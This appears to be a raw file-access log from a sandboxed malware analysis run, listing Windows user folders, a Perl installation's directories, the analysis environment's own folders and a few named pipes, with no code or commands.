c:\Documents and Settings\User\*<br />
c:\Documents and Settings\User<br />
c:\Documents and Settings\User\Cookies\*<br />
c:\Documents and Settings\User\Cookies<br />
c:\Documents and Settings\User\Desktop\*<br />
c:\Documents and Settings\User\Desktop<br />
c:\Documents and Settings\User\Favorites\*<br />
c:\Documents and Settings\User\Favorites<br />
c:\Documents and Settings\User\Favorites\Links\*<br />
c:\Documents and Settings\User\Favorites\Links<br />
c:\Documents and Settings\User\My Documents\*<br />
c:\Documents and Settings\User\My Documents<br />
c:\Documents and Settings\User\My Documents\Downloads\*<br />
c:\Documents and Settings\User\My Documents\Downloads<br />
c:\Documents and Settings\User\My Documents\My Music\*<br />
c:\Documents and Settings\User\My Documents\My Music<br />
c:\Documents and Settings\User\My Documents\My Pictures\*<br />
c:\Documents and Settings\User\My Documents\My Pictures<br />
c:\Documents and Settings\User\Start Menu\*<br />
c:\Documents and Settings\User\Start Menu<br />
c:\Documents and Settings\User\Start Menu\Programs\*<br />
c:\Documents and Settings\User\Start Menu\Programs<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\*<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\Accessibility\*<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\Accessibility<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\Entertainment\*<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\Entertainment<br />
c:\Documents and Settings\User\Start Menu\Programs\Startup\*<br />
c:\Documents and Settings\User\Start Menu\Programs\Startup<br />
c:\EpbkAfIwEo\*<br />
c:\EpbkAfIwEo<br />
c:\EpbkAfIwEo\drop\*<br />
c:\EpbkAfIwEo\drop<br />
c:\EpbkAfIwEo\files\*<br />
c:\EpbkAfIwEo\files<br />
c:\EpbkAfIwEo\logs\*<br />
c:\EpbkAfIwEo\logs<br />
c:\EpbkAfIwEo\memory\*<br />
c:\EpbkAfIwEo\memory<br />
c:\EpbkAfIwEo\shots\*<br />
c:\EpbkAfIwEo\shots<br />
c:\Lib\*<br />
c:\Lib<br />
c:\Lib\site-packages\*<br />
c:\Lib\site-packages<br />
c:\Lib\site-packages\distorm\*<br />
c:\Lib\site-packages\distorm<br />
c:\Perl\*<br />
c:\Perl<br />
c:\Perl\c\*<br />
c:\Perl\c<br />
c:\Perl\c\bin\*<br />
c:\Perl\c\bin<br />
c:\Perl\c\bin\startup\*<br />
c:\Perl\c\bin\startup<br />
c:\Perl\c\i686-w64-mingw32\*<br />
c:\Perl\c\i686-w64-mingw32<br />
c:\Perl\c\i686-w64-mingw32\bin\*<br />
c:\Perl\c\i686-w64-mingw32\bin<br />
C:\Device\RdpDr<br />
PIPE\wkssvc<br />
c:\Perl\c\i686-w64-mingw32\include\*<br />
c:\Perl\c\i686-w64-mingw32\include<br />
C:\Device\LanmanDatagramReceiver<br />
PIPE\browser<br />
shadow<br />
c:\Perl\c\i686-w64-mingw32\include\GL\*<br />
c:\Perl\c\i686-w64-mingw32\include\GL<br />
PIPE\srvsvc<br />
PIPE\DAV RPC SERVICE<br />
c:\Perl\c\i686-w64-mingw32\include\sdks\*<br />
c:\Perl\c\i686-w64-mingw32\include\sdks<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\*<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\sys\*<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\sys<br />
c:\Perl\c\i686-w64-mingw32\include\sys\*<br />
c:\Perl\c\i686-w64-mingw32\include\sys<br />
c:\Perl\c\i686-w64-mingw32\lib\*<br />
c:\Perl\c\i686-w64-mingw32\lib<br />
c:\Perl\c\i686-w64-mingw32\lib\ldscripts\*<br />
c:\Perl\c\i686-w64-mingw32\lib\ldscripts<br />
c:\Perl\c\include\*<br />
c:\Perl\c\include<br />
c:\Perl\c\include\c++\*<br />
c:\Perl\c\include\c++<br />
c:\Perl\c\include\c++\4.4.3\*<br />
c:\Perl\c\include\c++\4.4.3<br />
c:\Perl\c\include\c++\4.4.3\backward\*<br />
c:\Perl\c\include\c++\4.4.3\backward<br />
c:\Perl\c\include\c++\4.4.3\bits\*<br />
c:\Perl\c\include\c++\4.4.3\bits<br />
c:\Perl\c\include\c++\4.4.3\debug\*<br />
c:\Perl\c\include\c++\4.4.3\debug<br />
c:\Perl\c\include\c++\4.4.3\ext\*<br />
c:\Perl\c\include\c++\4.4.3\ext<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\basic_tree_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\basic_tree_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binary_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binary_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binomial_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binomial_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binomial_heap_base_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binomial_heap_base_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\bin_search_tree_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\bin_search_tree_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\cc_hash_table_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\cc_hash_table_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\eq_fn\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\eq_fn<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\gp_hash_table_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\gp_hash_table_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\hash_fn\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\hash_fn<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\left_child_next_sibling_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\left_child_next_sibling_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\list_update_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\list_update_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\list_update_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\list_update_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\ov_tree_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\ov_tree_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\pairing_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\pairing_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\pat_trie_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\pat_trie_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\rb_tree_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\rb_tree_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\rc_binomial_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\rc_binomial_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\resize_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\resize_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\splay_tree_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\splay_tree_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\thin_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\thin_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\tree_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\tree_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\trie_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\trie_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\unordered_iterator\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\unordered_iterator<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\*<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\*<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits<br />
c:\Perl\c\include\c++\4.4.3\tr1\*<br />
c:\Perl\c\include\c++\4.4.3\tr1<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\*<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl<br />
c:\Perl\c\include\freetype2\*<br />
c:\Perl\c\include\freetype2<br />
c:\Perl\c\include\freetype2\freetype\*<br />
c:\Perl\c\include\freetype2\freetype<br />
c:\Perl\c\include\freetype2\freetype\config\*<br />
c:\Perl\c\include\freetype2\freetype\config<br />
c:\Perl\c\include\GL\*<br />
c:\Perl\c\include\GL<br />
c:\Perl\c\include\libexslt\*<br />
c:\Perl\c\include\libexslt<br />
c:\Perl\c\include\libpng12\*<br />
c:\Perl\c\include\libpng12<br />
c:\Perl\c\include\libxml\*<br />
c:\Perl\c\include\libxml<br />
c:\Perl\c\include\libxslt\*<br />
c:\Perl\c\include\libxslt<br />
c:\Perl\c\include\lzma\*<br />
c:\Perl\c\include\lzma<br />
c:\Perl\c\include\mysql_5\*<br />
c:\Perl\c\include\mysql_5<br />
c:\Perl\c\include\mysql_5\mysql\*<br />
c:\Perl\c\include\mysql_5\mysql<br />
c:\Perl\c\include\openssl\*<br />
c:\Perl\c\include\openssl<br />
c:\Perl\c\include\X11\*<br />
c:\Perl\c\include\X11<br />
c:\Perl\c\lib\*<br />
c:\Perl\c\lib<br />
c:\Perl\c\lib\gcc\*<br />
c:\Perl\c\lib\gcc<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\include\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\include<br />
c:\Perl\c\lib\pkgconfig\*<br />
c:\Perl\c\lib\pkgconfig<br />
c:\Perl\c\lib32\*<br />
c:\Perl\c\lib32<br />
c:\Perl\c\libexec\*<br />
c:\Perl\c\libexec<br />
c:\Perl\c\libexec\gcc\*<br />
c:\Perl\c\libexec\gcc<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\*<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\*<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\install-tools\*<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\install-tools<br />
c:\Perl\cpan\*<br />
c:\Perl\cpan<br />
c:\Perl\cpan\sources\*<br />
c:\Perl\cpan\sources<br />
c:\Perl\cpanplus\*<br />
c:\Perl\cpanplus<br />
c:\Perl\licenses\*<br />
c:\Perl\licenses<br />
c:\Perl\licenses\binutils\*<br />
c:\Perl\licenses\binutils<br />
c:\Perl\licenses\dmake\*<br />
c:\Perl\licenses\dmake<br />
c:\Perl\licenses\gcc\*<br />
c:\Perl\licenses\gcc<br />
c:\Perl\licenses\gmake\*<br />
c:\Perl\licenses\gmake<br />
c:\Perl\licenses\libdb-BerkeleyDB\*<br />
c:\Perl\licenses\libdb-BerkeleyDB<br />
c:\Perl\licenses\libexpat\*<br />
c:\Perl\licenses\libexpat<br />
c:\Perl\licenses\libfreeglut\*<br />
c:\Perl\licenses\libfreeglut<br />
c:\Perl\licenses\libfreetype\*<br />
c:\Perl\licenses\libfreetype<br />
c:\Perl\licenses\libgd\*<br />
c:\Perl\licenses\libgd<br />
c:\Perl\licenses\libgdbm\*<br />
c:\Perl\licenses\libgdbm<br />
c:\Perl\licenses\libgif\*<br />
c:\Perl\licenses\libgif<br />
c:\Perl\licenses\libgmp\*<br />
c:\Perl\licenses\libgmp<br />
c:\Perl\licenses\libiconv\*<br />
c:\Perl\licenses\libiconv<br />
c:\Perl\licenses\libjpeg\*<br />
c:\Perl\licenses\libjpeg<br />
c:\Perl\licenses\liblzma\*<br />
c:\Perl\licenses\liblzma<br />
c:\Perl\licenses\libmpc\*<br />
c:\Perl\licenses\libmpc<br />
c:\Perl\licenses\libmpfr\*<br />
c:\Perl\licenses\libmpfr<br />
c:\Perl\licenses\libpng\*<br />
c:\Perl\licenses\libpng<br />
c:\Perl\licenses\libssh2\*<br />
c:\Perl\licenses\libssh2<br />
c:\Perl\licenses\libtiff\*<br />
c:\Perl\licenses\libtiff<br />
c:\Perl\licenses\libxml2\*<br />
c:\Perl\licenses\libxml2<br />
c:\Perl\licenses\libxpm\*<br />
c:\Perl\licenses\libxpm<br />
c:\Perl\licenses\libxslt\*<br />
c:\Perl\licenses\libxslt<br />
c:\Perl\licenses\libzlib\*<br />
c:\Perl\licenses\libzlib<br />
c:\Perl\licenses\mingw-w64-crt\*<br />
c:\Perl\licenses\mingw-w64-crt<br />
c:\Perl\licenses\mysql\*<br />
c:\Perl\licenses\mysql<br />
c:\Perl\licenses\openssl\*<br />
c:\Perl\licenses\openssl<br />
c:\Perl\licenses\patch\*<br />
c:\Perl\licenses\patch<br />
c:\Perl\licenses\perl\*<br />
c:\Perl\licenses\perl<br />
c:\Perl\licenses\pexports\*<br />
c:\Perl\licenses\pexports<br />
c:\Perl\licenses\postgresql\*<br />
c:\Perl\licenses\postgresql<br />
c:\Perl\perl\*<br />
c:\Perl\perl<br />
c:\Perl\perl\bin\*<br />
c:\Perl\perl\bin<br />
c:\Perl\perl\lib\*<br />
c:\Perl\perl\lib<br />
c:\Perl\perl\lib\App\*<br />
c:\Perl\perl\lib\App<br />
c:\Perl\perl\lib\App\Prove\*<br />
c:\Perl\perl\lib\App\Prove<br />
c:\Perl\perl\lib\App\Prove\State\*<br />
c:\Perl\perl\lib\App\Prove\State<br />
c:\Perl\perl\lib\App\Prove\State\Result\*<br />
c:\Perl\perl\lib\App\Prove\State\Result<br />
c:\Perl\perl\lib\Archive\*<br />
c:\Perl\perl\lib\Archive<br />
c:\Perl\perl\lib\Archive\Tar\*<br />
c:\Perl\perl\lib\Archive\Tar<br />
c:\Perl\perl\lib\Attribute\*<br />
c:\Perl\perl\lib\Attribute<br />
c:\Perl\perl\lib\auto\*<br />
c:\Perl\perl\lib\auto<br />
c:\Perl\perl\lib\auto\Archive\*<br />
c:\Perl\perl\lib\auto\Archive<br />
c:\Perl\perl\lib\auto\Archive\Extract\*<br />
c:\Perl\perl\lib\auto\Archive\Extract<br />
c:\Perl\perl\lib\auto\Archive\Tar\*<br />
c:\Perl\perl\lib\auto\Archive\Tar<br />
c:\Perl\perl\lib\auto\Attribute\*<br />
c:\Perl\perl\lib\auto\Attribute<br />
c:\Perl\perl\lib\auto\Attribute\Handlers\*<br />
c:\Perl\perl\lib\auto\Attribute\Handlers<br />
c:\Perl\perl\lib\auto\attributes\*<br />
c:\Perl\perl\lib\auto\attributes<br />
c:\Perl\perl\lib\auto\autodie\*<br />
c:\Perl\perl\lib\auto\autodie<br />
c:\Perl\perl\lib\auto\AutoLoader\*<br />
c:\Perl\perl\lib\auto\AutoLoader<br />
c:\Perl\perl\lib\auto\B\*<br />
c:\Perl\perl\lib\auto\B<br />
c:\Perl\perl\lib\auto\B\Debug\*<br />
c:\Perl\perl\lib\auto\B\Debug<br />
c:\Perl\perl\lib\auto\B\Lint\*<br />
c:\Perl\perl\lib\auto\B\Lint<br />
c:\Perl\perl\lib\auto\bignum\*<br />
c:\Perl\perl\lib\auto\bignum<br />
c:\Perl\perl\lib\auto\CGI\*<br />
c:\Perl\perl\lib\auto\CGI<br />
c:\Perl\perl\lib\auto\Compress\*<br />
c:\Perl\perl\lib\auto\Compress<br />
c:\Perl\perl\lib\auto\Compress\Raw\*<br />
c:\Perl\perl\lib\auto\Compress\Raw<br />
c:\Perl\perl\lib\auto\Compress\Raw\Bzip2\*<br />
c:\Perl\perl\lib\auto\Compress\Raw\Bzip2<br />
c:\Perl\perl\lib\auto\Compress\Raw\Zlib\*<br />
c:\Perl\perl\lib\auto\Compress\Raw\Zlib<br />
c:\Perl\perl\lib\auto\Compress\Zlib\*<br />
c:\Perl\perl\lib\auto\Compress\Zlib<br />
c:\Perl\perl\lib\auto\constant\*<br />
c:\Perl\perl\lib\auto\constant<br />
c:\Perl\perl\lib\auto\CPAN\*<br />
c:\Perl\perl\lib\auto\CPAN<br />
c:\Perl\perl\lib\auto\CPANPLUS\*<br />
c:\Perl\perl\lib\auto\CPANPLUS<br />
c:\Perl\perl\lib\auto\CPANPLUS\Dist\*<br />
c:\Perl\perl\lib\auto\CPANPLUS\Dist<br />
c:\Perl\perl\lib\auto\CPANPLUS\Dist\Build\*<br />
c:\Perl\perl\lib\auto\CPANPLUS\Dist\Build<br />
c:\Perl\perl\lib\auto\Cwd\*<br />
c:\Perl\perl\lib\auto\Cwd<br />
c:\Perl\perl\lib\auto\Data\*<br />
c:\Perl\perl\lib\auto\Data<br />
c:\Perl\perl\lib\auto\Data\Dumper\*<br />
c:\Perl\perl\lib\auto\Data\Dumper<br />
c:\Perl\perl\lib\auto\Devel\*<br />
c:\Perl\perl\lib\auto\Devel<br />
c:\Perl\perl\lib\auto\Devel\DProf\*<br />
c:\Perl\perl\lib\auto\Devel\DProf<br />
c:\Perl\perl\lib\auto\Devel\Peek\*<br />
c:\Perl\perl\lib\auto\Devel\Peek<br />
c:\Perl\perl\lib\auto\Devel\PPPort\*<br />
c:\Perl\perl\lib\auto\Devel\PPPort<br />
c:\Perl\perl\lib\auto\Devel\SelfStubber\*<br />
c:\Perl\perl\lib\auto\Devel\SelfStubber<br />
c:\Perl\perl\lib\auto\Digest\*<br />
c:\Perl\perl\lib\auto\Digest<br />
c:\Perl\perl\lib\auto\Digest\MD5\*<br />
c:\Perl\perl\lib\auto\Digest\MD5<br />
c:\Perl\perl\lib\auto\Digest\SHA\*<br />
c:\Perl\perl\lib\auto\Digest\SHA<br />
c:\Perl\perl\lib\auto\Dumpvalue\*<br />
c:\Perl\perl\lib\auto\Dumpvalue<br />
c:\Perl\perl\lib\auto\DynaLoader\*<br />
c:\Perl\perl\lib\auto\DynaLoader<br />
c:\Perl\perl\lib\auto\Encode\*<br />
c:\Perl\perl\lib\auto\Encode<br />
c:\Perl\perl\lib\auto\Encode\Byte\*<br />
c:\Perl\perl\lib\auto\Encode\Byte<br />
c:\Perl\perl\lib\auto\Encode\CN\*<br />
c:\Perl\perl\lib\auto\Encode\CN<br />
c:\Perl\perl\lib\auto\Encode\EBCDIC\*<br />
c:\Perl\perl\lib\auto\Encode\EBCDIC<br />
c:\Perl\perl\lib\auto\Encode\JP\*<br />
c:\Perl\perl\lib\auto\Encode\JP<br />
c:\Perl\perl\lib\auto\Encode\KR\*<br />
c:\Perl\perl\lib\auto\Encode\KR<br />
c:\Perl\perl\lib\auto\Encode\Symbol\*<br />
c:\Perl\perl\lib\auto\Encode\Symbol<br />
c:\Perl\perl\lib\auto\Encode\TW\*<br />
c:\Perl\perl\lib\auto\Encode\TW<br />
c:\Perl\perl\lib\auto\Encode\Unicode\*<br />
c:\Perl\perl\lib\auto\Encode\Unicode<br />
c:\Perl\perl\lib\auto\Env\*<br />
c:\Perl\perl\lib\auto\Env<br />
c:\Perl\perl\lib\auto\ExtUtils\*<br />
c:\Perl\perl\lib\auto\ExtUtils<br />
c:\Perl\perl\lib\auto\ExtUtils\CBuilder\*<br />
c:\Perl\perl\lib\auto\ExtUtils\CBuilder<br />
c:\Perl\perl\lib\auto\ExtUtils\Command\*<br />
c:\Perl\perl\lib\auto\ExtUtils\Command<br />
c:\Perl\perl\lib\auto\ExtUtils\Constant\*<br />
c:\Perl\perl\lib\auto\ExtUtils\Constant<br />
c:\Perl\perl\lib\auto\ExtUtils\Manifest\*<br />
c:\Perl\perl\lib\auto\ExtUtils\Manifest<br />
c:\Perl\perl\lib\auto\ExtUtils\ParseXS\*<br />
c:\Perl\perl\lib\auto\ExtUtils\ParseXS<br />
c:\Perl\perl\lib\auto\Fcntl\*<br />
c:\Perl\perl\lib\auto\Fcntl<br />
c:\Perl\perl\lib\auto\File\*<br />
c:\Perl\perl\lib\auto\File<br />
c:\Perl\perl\lib\auto\File\Fetch\*<br />
c:\Perl\perl\lib\auto\File\Fetch<br />
c:\Perl\perl\lib\auto\File\Glob\*<br />
c:\Perl\perl\lib\auto\File\Glob<br />
c:\Perl\perl\lib\auto\Filter\*<br />
c:\Perl\perl\lib\auto\Filter<br />
c:\Perl\perl\lib\auto\Filter\decrypt\*<br />
c:\Perl\perl\lib\auto\Filter\decrypt<br />
c:\Perl\perl\lib\auto\Filter\Simple\*<br />
c:\Perl\perl\lib\auto\Filter\Simple<br />
c:\Perl\perl\lib\auto\Filter\tee\*<br />
c:\Perl\perl\lib\auto\Filter\tee<br />
c:\Perl\perl\lib\auto\Filter\Util\*<br />
c:\Perl\perl\lib\auto\Filter\Util<br />
c:\Perl\perl\lib\auto\Filter\Util\Call\*<br />
c:\Perl\perl\lib\auto\Filter\Util\Call<br />
c:\Perl\perl\lib\auto\Filter\Util\Exec\*<br />
c:\Perl\perl\lib\auto\Filter\Util\Exec<br />
c:\Perl\perl\lib\auto\GDBM_File\*<br />
c:\Perl\perl\lib\auto\GDBM_File<br />
c:\Perl\perl\lib\auto\Hash\*<br />
c:\Perl\perl\lib\auto\Hash<br />
c:\Perl\perl\lib\auto\Hash\Util\*<br />
c:\Perl\perl\lib\auto\Hash\Util<br />
c:\Perl\perl\lib\auto\Hash\Util\FieldHash\*<br />
c:\Perl\perl\lib\auto\Hash\Util\FieldHash<br />
c:\Perl\perl\lib\auto\if\*<br />
c:\Perl\perl\lib\auto\if<br />
c:\Perl\perl\lib\auto\IO\*<br />
c:\Perl\perl\lib\auto\IO<br />
c:\Perl\perl\lib\auto\IO\Compress\*<br />
c:\Perl\perl\lib\auto\IO\Compress<br />
c:\Perl\perl\lib\auto\IPC\*<br />
c:\Perl\perl\lib\auto\IPC<br />
c:\Perl\perl\lib\auto\IPC\Cmd\*<br />
c:\Perl\perl\lib\auto\IPC\Cmd<br />
c:\Perl\perl\lib\auto\List\*<br />
c:\Perl\perl\lib\auto\List<br />
c:\Perl\perl\lib\auto\List\Util\*<br />
c:\Perl\perl\lib\auto\List\Util<br />
c:\Perl\perl\lib\auto\Locale\*<br />
c:\Perl\perl\lib\auto\Locale<br />
c:\Perl\perl\lib\auto\Locale\Codes\*<br />
c:\Perl\perl\lib\auto\Locale\Codes<br />
c:\Perl\perl\lib\auto\Locale-Maketext\*<br />
c:\Perl\perl\lib\auto\Locale-Maketext<br />
c:\Perl\perl\lib\auto\Log\*<br />
c:\Perl\perl\lib\auto\Log<br />
c:\Perl\perl\lib\auto\Log\Message\*<br />
c:\Perl\perl\lib\auto\Log\Message<br />
c:\Perl\perl\lib\auto\Log\Message\Simple\*<br />
c:\Perl\perl\lib\auto\Log\Message\Simple<br />
c:\Perl\perl\lib\auto\Math\*<br />
c:\Perl\perl\lib\auto\Math<br />
c:\Perl\perl\lib\auto\Math\BigInt\*<br />
c:\Perl\perl\lib\auto\Math\BigInt<br />
c:\Perl\perl\lib\auto\Math\BigInt\FastCalc\*<br />
c:\Perl\perl\lib\auto\Math\BigInt\FastCalc<br />
c:\Perl\perl\lib\auto\Math\BigRat\*<br />
c:\Perl\perl\lib\auto\Math\BigRat<br />
c:\Perl\perl\lib\auto\Math\Complex\*<br />
c:\Perl\perl\lib\auto\Math\Complex<br />
c:\Perl\perl\lib\auto\Memoize\*<br />
c:\Perl\perl\lib\auto\Memoize<br />
c:\Perl\perl\lib\auto\MIME\*<br />
c:\Perl\perl\lib\auto\MIME<br />
c:\Perl\perl\lib\auto\MIME\Base64\*<br />
c:\Perl\perl\lib\auto\MIME\Base64<br />
c:\Perl\perl\lib\auto\Module\*<br />
c:\Perl\perl\lib\auto\Module<br />
c:\Perl\perl\lib\auto\Module\Build\*<br />
c:\Perl\perl\lib\auto\Module\Build<br />
c:\Perl\perl\lib\auto\Module\CoreList\*<br />
c:\Perl\perl\lib\auto\Module\CoreList<br />
c:\Perl\perl\lib\auto\Module\Load\*<br />
c:\Perl\perl\lib\auto\Module\Load<br />
c:\Perl\perl\lib\auto\Module\Load\Conditional\*<br />
c:\Perl\perl\lib\auto\Module\Load\Conditional<br />
c:\Perl\perl\lib\auto\mro\*<br />
c:\Perl\perl\lib\auto\mro<br />
c:\Perl\perl\lib\auto\NEXT\*<br />
c:\Perl\perl\lib\auto\NEXT<br />
c:\Perl\perl\lib\auto\Object\*<br />
c:\Perl\perl\lib\auto\Object<br />
c:\Perl\perl\lib\auto\Object\Accessor\*<br />
c:\Perl\perl\lib\auto\Object\Accessor<br />
c:\Perl\perl\lib\auto\Opcode\*<br />
c:\Perl\perl\lib\auto\Opcode<br />
c:\Perl\perl\lib\auto\Params\*<br />
c:\Perl\perl\lib\auto\Params<br />
c:\Perl\perl\lib\auto\Params\Check\*<br />
c:\Perl\perl\lib\auto\Params\Check<br />
c:\Perl\perl\lib\auto\parent\*<br />
c:\Perl\perl\lib\auto\parent<br />
c:\Perl\perl\lib\auto\Parse\*<br />
c:\Perl\perl\lib\auto\Parse<br />
c:\Perl\perl\lib\auto\Parse\CPAN\*<br />
c:\Perl\perl\lib\auto\Parse\CPAN<br />
c:\Perl\perl\lib\auto\Parse\CPAN\Meta\*<br />
c:\Perl\perl\lib\auto\Parse\CPAN\Meta<br />
c:\Perl\perl\lib\auto\PerlIO\*<br />
c:\Perl\perl\lib\auto\PerlIO<br />
c:\Perl\perl\lib\auto\PerlIO\encoding\*<br />
c:\Perl\perl\lib\auto\PerlIO\encoding<br />
c:\Perl\perl\lib\auto\PerlIO\scalar\*<br />
c:\Perl\perl\lib\auto\PerlIO\scalar<br />
c:\Perl\perl\lib\auto\PerlIO\via\*<br />
c:\Perl\perl\lib\auto\PerlIO\via<br />
c:\Perl\perl\lib\auto\Pod\*<br />
c:\Perl\perl\lib\auto\Pod<br />
c:\Perl\perl\lib\auto\Pod\LaTeX\*<br />
c:\Perl\perl\lib\auto\Pod\LaTeX<br />
c:\Perl\perl\lib\auto\Pod\Plainer\*<br />
c:\Perl\perl\lib\auto\Pod\Plainer<br />
c:\Perl\perl\lib\auto\Pod\Simple\*<br />
c:\Perl\perl\lib\auto\Pod\Simple<br />
c:\Perl\perl\lib\auto\POSIX\*<br />
c:\Perl\perl\lib\auto\POSIX<br />
c:\Perl\perl\lib\auto\POSIX\SigAction\*<br />
c:\Perl\perl\lib\auto\POSIX\SigAction<br />
c:\Perl\perl\lib\auto\POSIX\SigRt\*<br />
c:\Perl\perl\lib\auto\POSIX\SigRt<br />
c:\Perl\perl\lib\auto\re\*<br />
c:\Perl\perl\lib\auto\re<br />
c:\Perl\perl\lib\auto\Safe\*<br />
c:\Perl\perl\lib\auto\Safe<br />
c:\Perl\perl\lib\auto\sdbm\*<br />
c:\Perl\perl\lib\auto\sdbm<br />
c:\Perl\perl\lib\auto\SDBM_File\*<br />
c:\Perl\perl\lib\auto\SDBM_File<br />
c:\Perl\perl\lib\auto\SelfLoader\*<br />
c:\Perl\perl\lib\auto\SelfLoader<br />
c:\Perl\perl\lib\auto\Socket\*<br />
c:\Perl\perl\lib\auto\Socket<br />
c:\Perl\perl\lib\auto\Storable\*<br />
c:\Perl\perl\lib\auto\Storable<br />
c:\Perl\perl\lib\auto\Sys\*<br />
c:\Perl\perl\lib\auto\Sys<br />
c:\Perl\perl\lib\auto\Sys\Hostname\*<br />
c:\Perl\perl\lib\auto\Sys\Hostname<br />
c:\Perl\perl\lib\auto\Term\*<br />
c:\Perl\perl\lib\auto\Term<br />
c:\Perl\perl\lib\auto\Term\ANSIColor\*<br />
c:\Perl\perl\lib\auto\Term\ANSIColor<br />
c:\Perl\perl\lib\auto\Term\ReadLine\*<br />
c:\Perl\perl\lib\auto\Term\ReadLine<br />
c:\Perl\perl\lib\auto\Term\UI\*<br />
c:\Perl\perl\lib\auto\Term\UI<br />
